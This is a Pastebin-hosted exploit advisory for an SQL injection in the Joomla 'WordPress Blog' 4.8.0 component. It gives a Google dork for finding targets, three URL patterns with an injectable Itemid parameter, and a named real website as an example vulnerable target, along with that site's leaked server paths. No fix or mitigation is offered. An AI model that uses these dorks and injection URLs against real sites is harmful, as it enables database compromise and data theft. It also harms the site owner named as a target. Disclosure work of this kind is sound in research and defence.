KingSkrupellos

Joomla WordPress Blog 4.8.0 SQL Injection

Feb 11th, 2019
58
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.44 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla WordPress Blog 4.8.0 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 12/02/2019
  7. # Vendor Homepage : cms2cms.com - corephp.com
  8. # Software Download Link : corephp.com/joomla-products/wordpress-for-joomla/buy-now/new
  9. # Software Information Link : extensions.joomla.org/extension/wordpress-blog-for-joomla/
  10. cms2cms.com/wordpress-to-joomla-3-migration-extension/
  11. # Software Version : 4.8.0
  12. # Tested On : Windows and Linux
  13. # Category : WebApps
  14. # Exploit Risk : Medium
  15. # Google Dorks : inurl:''/index.php?option=com_wordpress''
  16. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  17. Special Elements used in an SQL Command ('SQL Injection') ]
  18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  21.  
  22. ####################################################################
  23.  
  24. # Description about Software :
  25. ***************************
  26. WordPress For Joomla empowers professional site owners to deploy the world's
  27.  
  28. leading blog software, powered by the best CMS on the planet.
  29.  
  30. It's truly an unbeatable combination of content technology.
  31.  
  32. ####################################################################
  33.  
  34. # Impact :
  35. ***********
  36. Joomla WordPress Blog 4.8.0 and other versions -
  37.  
  38. component for Joomla is prone to an SQL-injection vulnerability because it
  39.  
  40. fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  41.  
  42. Exploiting this issue could allow an attacker to compromise the application,
  43.  
  44. access or modify data, or exploit latent vulnerabilities in the underlying database.
  45.  
  46. A remote attacker can send a specially crafted request to the vulnerable application
  47.  
  48. and execute arbitrary SQL commands in application`s database.
  49.  
  50. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  51.  
  52. An attacker can exploit this issue using a browser.
  53.  
  54. ####################################################################
  55.  
  56. # SQL Injection Exploit :
  57. **********************
  58. /index.php?option=com_wordpress&Itemid=[SQL Injection]&feed=atom
  59.  
  60. /index.php?option=com_wordpress&attachment_id=[ID-NUMBER]&Itemid=[SQL Injection]
  61.  
  62. /index.php?tag=guidance&paged=[ID-NUMBER]&Itemid=[SQL Injection]&option=com_wordpress
  63.  
  64. ####################################################################
  65.  
  66. # Example Vulnerable Sites :
  67. *************************
  68. [+] flexibleresources.com/index.php?option=com_wordpress&attachment_id=9&Itemid=33%27
  69.  
  70. ####################################################################
  71.  
  72. # Example SQL Database Error :
  73. ****************************
  74. <b>Strict Standards</b>: Declaration of Walker_Page::start_lvl() should be
  75. compatible with Walker::start_lvl(&$output) in <b>/nfs/c10/h05/mnt/142825
  76. /domains/flexibleresources.com/html/components/com_wordpress
  77. /wp-includes/classes.php</b> on line <b>1217</b><br />
  78.  
  79. Strict Standards: Non-static method JLoader::import() should not
  80. be called statically in /nfs/c10/h05/mnt/142825/domains
  81. /flexibleresources.com/html/libraries/loader.php on line 186
  82.  
  83. ####################################################################
  84.  
  85. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  86.  
  87. ####################################################################
Add Comment
Please, Sign In to add comment